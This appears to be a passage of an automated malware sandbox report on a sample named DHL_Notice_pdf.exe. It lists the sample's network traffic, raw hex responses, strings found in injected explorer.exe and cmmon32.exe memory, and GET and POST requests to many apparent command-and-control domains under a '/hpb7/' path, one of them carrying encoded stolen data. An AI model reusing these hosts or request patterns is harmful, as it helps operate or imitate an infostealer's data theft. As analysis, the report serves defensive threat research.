          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 21 Mar 2023 07:08:36 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 21 Mar 2023 07:08:38 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000002.517404436.000000001584A000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.0000000004EEA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/ds
          Source: DHL_Notice_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.517404436.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.00000000056C4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0dhy.xyz
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0dhy.xyz/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.club
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.club/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.clubReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/j
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfdReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/hpb7/:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com/hpb7/Xz.
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com/hpb7/:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.513596661.000000000B74D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.com
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.com/hpb7/
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ru
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ru/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ruReferer:
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org/hpb7/I
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.com
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyz
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyz/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyzReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com/hpb7/
          Source: 146E771M.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 146E771M.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
          Source: unknownDNS traffic detected: queries for: www.yongleproducts.com
          Source: C:\Windows\explorer.exeCode function: 4_2_0B73A4E2 getaddrinfo,SleepEx,setsockopt,recv,recv,4_2_0B73A4E2
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
